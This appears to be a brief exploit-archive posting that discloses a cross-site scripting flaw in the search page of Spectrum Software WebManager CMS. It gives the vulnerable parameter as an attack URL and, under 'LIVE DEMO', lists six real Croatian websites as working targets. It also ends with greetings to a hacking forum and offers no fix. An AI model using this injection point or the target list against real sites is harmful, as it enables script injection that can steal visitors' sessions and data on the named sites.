Spectrum Software WebManager CMS suffers from a cross site scripting vulnerability.
bf9aef9cb2dc941a3e59ab2ae1c3e5b1d82affae1c545e8d8221cd4bb97bff2d
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org
.:. Script : Spectrum Software WebManager CMS
.:. Info link: http://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx
.:. Bug Type : Cross-site scripting (XSS)
####################################################################
===[ Exploit ]===
http://www.server/Search_1.aspx?pojam=[XSS]
===[ Example ]===
http://www.server/Search_1.aspx?pojam=
LIVE DEMO(for validation only, remove it from publication!):
http://www.bpz.hr/Search_1.aspx?pojam=
http://www.halajko.hr/Search_1.aspx?pojam=
http://www.garten.hr/Search_1.aspx?pojam=
http://www.freezone-brod.hr/Search_1.aspx?pojam=
http://www.dd-aparati.hr/Search_1.aspx?pojam=
http://www.vuko.hr/Search_1.aspx?pojam=
Greetz to ALL EVILZONE.org members!!!
Pozdrav za sve iz Srbije!!! :-)))